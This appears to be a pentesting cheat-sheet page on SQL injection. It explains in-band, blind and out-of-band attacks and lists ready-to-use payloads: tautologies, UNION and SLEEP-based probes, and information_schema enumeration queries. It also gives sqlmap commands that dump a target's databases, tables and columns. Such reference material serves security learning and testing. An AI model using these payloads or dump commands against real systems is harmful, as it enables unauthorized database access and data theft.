Skip to main content

💉 SQLi

SQL injections (SQLi) is a type of vulnerability that allows the execution of malicious queries.

Types of SQLi:

  • In-Band SQLi
  • Blind SQLi
  • Out-of-band SQLi

In-Band SQL Injection

In-band SQLi are based on the output of the query that is showed directly to the user.

This attack allows to extract easily a lot of data from the database.

  • Union based: the attacker uses the UNION operator to read data from additional tables.
  • Error based: the server returns the database errors allowing an easier interaction for the attacker.

Common payloads

OR 1 = 1; --
UNION 1,2,3; --

Blind SQLi

In blind SQLi no direct feedbacks are returned from the server.

There are different ways to make a blind SQLi:

  • Authentication bypass: the output is not needed because the goal is to bypass a login form.
  • Boolean based: the server replies only with a boolean.
  • Time based: based on the sleep function and the time needed by the query to complete.

Common payloads

UNION SELECT SLEEP(5);--
WHERE database() LIKE 'a%'
FROM information_schema.tables WHERE table_schema = 'DATABASE_NAME' and table_name like 'a%';
FROM information_schema.columns WHERE table_schema='DATABASE_NAME' and table_name='DATABASE_TABLE' and column_name like 'a%';

Enumeratation example

WHERE database() LIKE 'a%'
WHERE database() LIKE 'b%'
WHERE database() LIKE 'c%'
WHERE database() LIKE 'd%'

WHERE database() LIKE 'da%'
WHERE database() LIKE 'db%'

WHERE database() LIKE 'dba%'
WHERE database() LIKE 'dbb%'
...

Out-of-band SQLi

Out-Of-Band attacks are based on two different channels: one for the injection and the other to check the output.

Warnings

caution

This is a list of few important warnings about SQL queries and SQLi.

SQL is not case sensitive

SQL clauses and schema values are not case sensitive.

-- all equals
SELECT * FROM USERS WHERE USERNAME='admin';
select * from users where username='admin';
Select * From Users Where Username='admin';
SeLeCt * FrOm UsErs WhErE UsErNaMe='admin';

Comments

A single space after the double slash could be needed. For example, in MySQL is mandatory.

; -- this is a comment
; --this could not be a comment

Quotes

Single quotes are not always interchangeable with double quotes. For example, PostgreSQL allows only single quotes for values and double quotes for schema names.

select "column" from "table" where "column"='value';

sqlmap

Use -u to define the target url and --batch to use the default behavior without asking for input.

In the next commands, id is a query parameter that is vulnerable to SQL injection.

Enumerate databases.

sqlmap -u "http://website.com/?id=1" --batch --dbs

Enumerate tables of a specific database.

sqlmap -u "http://website.com/?id=1" --batch --tables -D db_name

Enumerate tables content of a specific database.

sqlmap -u "http://website.com/?id=1" --batch --dump -D db_name

Enumerate content by specifying table, column, and database.

sqlmap -u "http://website.com/?id=1" --batch --dump -D db_name -T table_name -C col_name

sqlmap over websockets

sqlmap may not support all types of requests, including those made over websockets. Also, working with complex targets can sometimes be cumbersome using sqlmap alone.

To simplify the process, it is possible to set up a fake server as an intermediary. In this way, sqlmap would make a request to the fake server using a common format, and the fake server would then make the more complex request to the actual target.